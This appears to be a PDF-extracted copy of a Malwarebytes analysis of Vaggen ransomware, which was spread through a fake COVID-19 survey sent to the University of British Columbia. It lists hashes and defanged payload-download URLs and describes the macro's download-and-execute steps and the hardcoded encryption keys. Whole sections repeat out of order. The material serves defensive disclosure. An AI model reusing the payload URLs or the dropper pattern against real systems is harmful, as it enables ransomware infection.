ttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3027 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3028 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3029 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3030 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3031 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3032 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3033 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3034 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3035 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3036 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3037 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3038 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3039 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3040 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3041 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3042 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3043 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3044 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3045 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3046 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3047 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3048 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3049 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3050 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3051 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3052 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3053 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3054 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3055 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3056 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3057 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3058 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3059 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with 